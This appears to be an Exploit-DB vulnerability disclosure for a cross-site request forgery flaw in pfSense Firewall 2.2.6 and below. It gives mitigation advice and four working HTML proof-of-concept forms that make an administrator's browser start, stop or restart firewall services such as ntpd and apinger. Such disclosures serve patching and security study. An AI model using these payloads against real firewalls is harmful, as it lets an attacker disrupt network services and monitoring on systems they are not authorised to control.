Vendor: pfSense Firewall
By: Aatif Shahdad
CVSS: 7.5 (HIGH)
Type: Cross-Site Request Forgery
CWE: 352
Product Name: pfSense Firewall
Affected Version From: 2.2.6 and below.
Affected Version To: 2.2.6 and below.
Patch Exists: YES
CPE: pfsense
2020

pfSense Firewall <= 2.2.6 Cross-Site Request Forgery

An attacker can coerce a logged-in victim's browser to issue requests that will start/stop/restart services on the Firewall.

Mitigation:

Upgrading to the latest version of pfSense Firewall will fix this vulnerability.

Exploit-DB raw data:

# Exploit Title: pfSense Firewall <= 2.2.6 Cross-Site Request Forgery 
# Exploit Author: Aatif Shahdad
# Software Link: http://files.nyi.pfsense.org/mirror/downloads/old/pfSense-LiveCD-2.2.5-RELEASE-i386.iso.gz
# Version: 2.2.6 and below.
# Contact: https://twitter.com/61617469665f736
# Category: webapps


1. Description

An attacker can coerce a logged-in victim's browser to issue requests that will start/stop/restart services on the Firewall. 


2. Proof of Concept

Log in to the Web Console, for example, http://192.168.0.1 (set at the time of install), and open the following PoCs:


Start NTPD service:

<html>
 <body>
   <form action="https://192.168.0.1/status_services.php">
     <input type="hidden" name="mode" value="startservice" />
     <input type="hidden" name="service" value="ntpd" />
     <input type="submit" value="Submit request" />
   </form>
 </body>
</html>


Stop NTPD service:

<html>
 <body>
   <form action="https://192.168.0.1/status_services.php">
     <input type="hidden" name="mode" value="stopservice" />
     <input type="hidden" name="service" value="ntpd" />
     <input type="submit" value="Submit request" />
   </form>
 </body>
</html>



Restart NTPD service:

POC:
<html>
 <body>
   <form action="https://192.168.0.1/status_services.php">
     <input type="hidden" name="mode" value="restartservice" />
     <input type="hidden" name="service" value="ntpd" />
     <input type="submit" value="Submit request" />
   </form>
 </body>
</html>

The service will automatically start/stop. 

Note: the NTPD service can be replaced with any service running on the Firewall. For example, to stop the APINGER (gateway monitoring daemon) service, use the following POC:

<html>
 <body>
   <form action="https://192.168.0.1/status_services.php">
     <input type="hidden" name="mode" value="stopservice" />
     <input type="hidden" name="service" value="apinger" />
     <input type="submit" value="Submit request" />
   </form>
 </body>
</html>



3. Solution:

Upgrade to version 2.3 at https://www.pfsense.org/download/mirror.php?section=downloads